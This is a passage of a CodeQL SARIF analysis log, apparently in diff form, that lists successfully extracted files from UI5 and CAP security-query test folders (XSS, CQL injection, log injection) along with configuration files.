"none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 358 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 359 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", - "uriBaseId" : "%SRCROOT%", - "index" : 360 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 361 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 362 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 363 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 364 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 365 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 366 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 367 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 368 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 369 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 370 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 371 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 372 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 373 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 374 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", - "uriBaseId" : "%SRCROOT%", - "index" : 375 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 376 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 377 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 378 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 379 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 380 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 381 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", - "uriBaseId" : "%SRCROOT%", - "index" : 382 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 383 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 384 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 385 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 386 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 387 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 388 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 389 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 390 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 391 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 392 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 393 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 394 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 395 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 396 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 397 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 398 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 399 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 400 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 401 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 402 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 403 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 404 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 405 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 406 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 407 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 408 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 409 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 410 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 411 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/Sources/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 4 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 412 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 413 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "qlt.conf.json", - "uriBaseId" : "%SRCROOT%", - "index" : 414 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "scripts/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 415 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "scripts/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 416 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - } ], - "executionSuccessful" : true - } ], - "artifacts" : [ { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - } - }, { - "location" : { - "uri" : "javascript/heuristic-models/tests/Sources/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 4 - } - }, { - "location" : { - "uri" : ".github/actions/install-codeql/action.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 5 - } - }, { - "location" : { - "uri" : ".github/actions/install-qlt/action.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 6 - } - }, { - "location" : { - "uri" : ".github/codeql/codeql-config.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 7 - } - }, { - "location" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 8 - } - }, { - 